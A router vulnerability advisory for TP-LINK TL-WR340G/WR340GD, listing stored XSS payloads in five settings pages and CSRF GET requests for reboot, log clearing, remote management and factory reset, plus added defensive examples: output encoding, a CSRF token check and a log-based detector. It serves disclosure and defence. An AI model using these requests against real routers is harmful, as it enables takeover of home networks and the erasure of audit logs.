Tr3v0r12345

TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities

Jul 4th, 2014
#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
#Date: 01.07.14
#Vendor: TP-LINK
#Affected versions: TL-WR340G/TL-WR340GD
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
#Contact: smash [at] devilteam.pl

Persistent cross-site scripting vulnerabilities exist because of poor parameter filtering. The submitted value is stored in a JavaScript array; since it is neither verified nor filtered correctly, JavaScript code can be injected, and it is executed whenever a user visits the affected settings page. Because there is no CSRF prevention, the router can be compromised: an attacker may force the user to restore factory default settings and then to turn on remote management, and as a result will be able to log in using the default username and password (admin:admin).

Config file - 192.168.1.1/userRpm/config.bin


#1 - Cross Site Scripting


a) Persistent XSS in Network > WAN Settings

Vulnerable parameter - hostName.

Request:
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var dhcpInf = new Array(
1,
(...)
"</script><script>alert(123)</script>",
0,0 );
</SCRIPT>
(...)


b) Persistent XSS in Wireless Settings

Vulnerable parameter - ssid.

Request:
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E&region=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
0,0 );
</SCRIPT>
(...)


c) Persistent XSS in DHCP Settings

Vulnerable parameter - domain.

Request:
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm

Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1,
"192.168.1.100",
"192.168.1.199",
120,
"0.0.0.0",
"</script><xssed>'\"",
"0.0.0.0",
"0.0.0.0",
1,
1,
0,0 );
</SCRIPT>
(...)


d) Persistent XSS in Security > Domain Filtering

Vulnerable parameter - domain; the value is validated by JavaScript in the browser to keep illegal characters out of the domain name. This client-side filtering is bypassed by sending the raw HTTP request directly.

Request:
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var domainFilterList = new Array(
"0000-2400", "hm</script><xssed>'\"", 1,
0,0 );
</SCRIPT>
(...)


e) Persistent XSS in Dynamic DNS Settings

Vulnerable parameters - username & cliUrl.

Request:
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
Host: 192.168.1.1

Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"

<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"",
"",
"</script><script>alert(123)</script>",
0,
0,
2,
2,
0,
1,
0,0 );
</SCRIPT>
(...)


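All five XSS cases above have the same root cause: a stored value is written into a JavaScript array literal inside an inline <SCRIPT> block with, at most, its quotes escaped. The HTML parser does not understand JavaScript string syntax, so the first `</script` inside the value ends the script element and everything after it is parsed as markup. The following is an added example, not code from the advisory or from TP-LINK: it reproduces the unsafe rendering with a constructed hostName value, then shows the encoding a firmware's page generator should apply instead. The `dhcpInf` page skeleton is taken from case (a); the function names are mine.

```python
import json
import re

# Constructed sample value with the same shape as the advisory's hostName payload.
UNTRUSTED_HOSTNAME = '</script><script>alert(123)</script>'

# Skeleton of the WAN settings page as shown in the advisory's response (a).
PAGE_TEMPLATE = (
    '<SCRIPT language="javascript" type="text/javascript">\n'
    'var dhcpInf = new Array(\n'
    '1,\n'
    '{value},\n'
    '0,0 );\n'
    '</SCRIPT>\n'
)


def render_vulnerable(hostname: str) -> str:
    """The unsafe pattern: only quotes and backslashes are escaped before the
    stored value is pasted into the inline script. The HTML parser terminates
    the <script> element at the first '</script', so the rest of the value is
    parsed as markup and any <script> element inside it is executed."""
    quoted = hostname.replace('\\', '\\\\').replace('"', '\\"')
    return PAGE_TEMPLATE.format(value='"' + quoted + '"')


def js_string_literal(value: str) -> str:
    """Encode an untrusted string for use inside an inline <script> block.

    1. json.dumps() escapes quotes, backslashes, control characters and all
       non-ASCII characters (which also removes the U+2028/U+2029 line
       terminators that end a string literal in older JavaScript engines).
    2. '</' is rewritten to '<\\/': JavaScript reads '\\/' as '/', so the value
       is unchanged, but the byte sequence '</script' never reaches the HTML parser.
    3. '<!--' is rewritten the same way, because the HTML script-data state
       also reacts to comment openers.
    """
    literal = json.dumps(value)
    literal = literal.replace('</', '<\\/')
    literal = literal.replace('<!--', '<\\!--')
    return literal


def render_hardened(hostname: str) -> str:
    """Same page, with the value passed through js_string_literal()."""
    return PAGE_TEMPLATE.format(value=js_string_literal(hostname))


def js_literal_roundtrips(value: str) -> bool:
    """The encoding must change only the representation, never the stored value.
    Checked with a JSON parser, for which '\\/' is a valid escape of '/'.
    (Values containing '<!--' use a JavaScript-only escape and are not checked
    this way.)"""
    return json.loads(js_string_literal(value)) == value


SCRIPT_CLOSE = re.compile(r'</script', re.IGNORECASE)


def count_script_closers(page: str) -> int:
    """Number of positions where an HTML parser would end a <script> element.
    A correctly rendered settings page has exactly one: its own </SCRIPT>."""
    return len(SCRIPT_CLOSE.findall(page))


if __name__ == '__main__':
    print(render_vulnerable(UNTRUSTED_HOSTNAME))
    print(render_hardened(UNTRUSTED_HOSTNAME))
```

Output encoding of this kind is the fix for the "parameter filtration" the advisory's solution line asks for; an input allow-list for hostnames, SSIDs and domain names is a useful second layer, but the encoding is what makes the page safe for whatever value ends up in the configuration.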
#2 - CSRF


a) Change LAN IP

The lanip parameter holds the new LAN IP address.

GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
Host: 192.168.1.1


b) Change remote management settings

GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1


c) Clear syslog

GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
Host: 192.168.1.1


d) Reboot device

GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
Host: 192.168.1.1


e) Restore factory defaults (admin:admin)

GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
Host: 192.168.1.1
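Every state change in the CSRF section is a plain GET with no secret in it, which is exactly what a third-party page can trigger through an image or frame while the victim's browser still holds the router's Basic-auth credentials. The following is an added example, not code from the advisory or from TP-LINK, of the request check a firmware would need: it models the five state-changing pages listed above and accepts a change only on a POST that is same-origin and carries a session-bound synchronizer token. The secret, session ids and the `csrf_token` field name are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed values: a real device would generate the secret at first boot
# and a fresh, unguessable session id at every login.
SERVER_SECRET = secrets.token_bytes(32)
OWN_ORIGIN = 'http://192.168.1.1'

# Pages from the advisory's CSRF section; each one changes device state and
# must therefore be reachable only through a POST that carries a valid token.
STATE_CHANGING_PATHS = {
    '/userRpm/NetworkLanCfgRpm.htm',
    '/userRpm/ManageControlRpm.htm',
    '/userRpm/SystemLogRpm.htm',
    '/userRpm/SysRebootRpm.htm',
    '/userRpm/RestoreDefaultCfgRpm.htm',
}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session id).
    The firmware would embed it as a hidden field in every settings form; it is
    re-derived at verification time, so no per-request storage is needed."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(header_value: Optional[str]) -> bool:
    """True only if an Origin or Referer header names the router's own origin."""
    if not header_value:
        return False
    got, own = urlsplit(header_value), urlsplit(OWN_ORIGIN)
    return (got.scheme, got.netloc) == (own.scheme, own.netloc)


def authorize(method: str, target: str, headers: Dict[str, str], body: str,
              session_id: str) -> Tuple[bool, str]:
    """Decide whether a request may proceed. Returns (allowed, reason).

    target is the request-target from the request line, for example
    '/userRpm/SysRebootRpm.htm?Reboot=Reboot'; body is the urlencoded form."""
    path = urlsplit(target).path
    if path not in STATE_CHANGING_PATHS:
        return True, 'not a state-changing page'
    # 1. No side effects on GET. Every request in the advisory is a plain GET,
    #    which an <img> or <iframe> on any third-party page can trigger.
    if method != 'POST':
        return False, 'state change requires POST'
    # 2. A form submitted from another site arrives with a foreign Origin or
    #    Referer (or with neither).
    if not same_origin(headers.get('Origin') or headers.get('Referer')):
        return False, 'missing or foreign Origin/Referer'
    # 3. The token in the form must be the one issued to this session;
    #    compare_digest keeps the comparison constant-time.
    token = parse_qs(body).get('csrf_token', [''])[0]
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, 'missing or invalid CSRF token'
    return True, 'ok'


if __name__ == '__main__':
    print(authorize('GET', '/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore',
                    {'Host': '192.168.1.1'}, '', 'session-A'))
    tok = issue_csrf_token('session-A')
    print(authorize('POST', '/userRpm/RestoreDefaultCfgRpm.htm',
                    {'Origin': OWN_ORIGIN}, 'Restorefactory=Restore&csrf_token=' + tok,
                    'session-A'))
```

One caveat that ties the two halves of the advisory together: the stored XSS runs inside the router's own origin, so script injected through an SSID or hostname can read the token out of the settings form and submit a valid POST itself. The token check closes the cross-site path; the output encoding of the stored values is still required for the same-origin one.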
# 2CCC9E6E50C8205C 1337day.com [2014-07-05] A550E4FFAFA05238 #


Description:
TP-LINK Model No. TL-WR340G & TL-WR340GD suffer from multiple persistent cross-site scripting and cross-site request forgery vulnerabilities.
Full title: TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
Date added: 2014-07-02
Category: web applications
Platform: hardware
Risk: Security Risk High
Vendor: tplink.com
Affected versions: TL-WR340G & TL-WR340GD
Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
Solution: CSRF prevention mechanism and solid parameter filtering.
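Until a firmware with the fixes above is available, the requests in this advisory are also easy to spot on the wire. The following is an added example, not part of the advisory, of detection logic run over constructed log lines from an HTTP-aware proxy or IDS placed in front of the router (its own syslog is not a reliable record, since CSRF case (c) shows it can be cleared by the same kind of request). It flags configuration writes arriving as GET, writes whose Referer is missing or foreign, and markup characters in parameters that should only ever hold a hostname, SSID or domain. The log format, client address, timestamps and the `StatusExample.htm` path are assumptions; the request shapes follow the advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines (Common Log Format plus a trailing Referer field), as an
# HTTP-aware proxy or IDS in front of the router might record them. Request
# shapes follow the advisory; client, timestamps, status codes and referers are
# made up.
SAMPLE_LOG = r'''
10.0.0.23 - - [01/Jul/2014:10:00:01 +0200] "GET /userRpm/StatusExample.htm HTTP/1.1" 200 "http://192.168.1.1/"
10.0.0.23 - - [01/Jul/2014:10:00:09 +0200] "GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1" 200 "-"
10.0.0.23 - - [01/Jul/2014:10:01:12 +0200] "GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1" 200 "http://evil.example/lure.html"
10.0.0.23 - - [01/Jul/2014:10:02:40 +0200] "GET /userRpm/WlanNetworkRpm.htm?ssid=HomeNet&region=102&channel=6&Save=Save HTTP/1.1" 200 "http://192.168.1.1/userRpm/WlanNetworkRpm.htm"
'''

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "(?P<referer>[^"]*)"$'
)

# Query parameters whose presence means the request writes configuration
# (taken from the advisory's requests).
ACTION_PARAMS = {'Save', 'Restorefactory', 'Reboot', 'Clearlog'}
# Characters that never belong in a hostname, SSID, domain or DDNS field.
MARKUP = re.compile(r'[<>"\']')
OWN_NETLOC = '192.168.1.1'


def analyse_line(line: str) -> list:
    """Return the alert tags for one log line (empty list if nothing is suspicious)."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    alerts = []
    parts = urlsplit(m['target'])
    # parse_qs percent-decodes once, so %3C/script%3E is inspected as </script>.
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path.startswith('/userRpm/') and ACTION_PARAMS.intersection(params):
        # A configuration write arriving as GET is forgeable from any web page;
        # a missing or foreign Referer makes a cross-site trigger the likely cause.
        if m['method'] == 'GET':
            alerts.append('config-change-via-GET')
        ref = m['referer']
        if ref == '-' or urlsplit(ref).netloc != OWN_NETLOC:
            alerts.append('foreign-or-missing-referer')
    for name, values in params.items():
        if any(MARKUP.search(v) for v in values):
            alerts.append('markup-in-param:' + name)
    return alerts


def scan(log_text: str) -> dict:
    """Map the path of every flagged request to its alert tags."""
    findings = {}
    for line in log_text.strip().splitlines():
        tags = analyse_line(line)
        if tags:
            path = urlsplit(LOG_LINE.match(line)['target']).path
            findings[path] = tags
    return findings


if __name__ == '__main__':
    for path, tags in scan(SAMPLE_LOG).items():
        print(path, ', '.join(tags))
```

On this firmware every legitimate settings save is also a GET, so the first tag alone is noise from normal administration; it becomes interesting in combination with a foreign Referer or with markup in a field, which is why the example keeps the tags separate rather than collapsing them into one score.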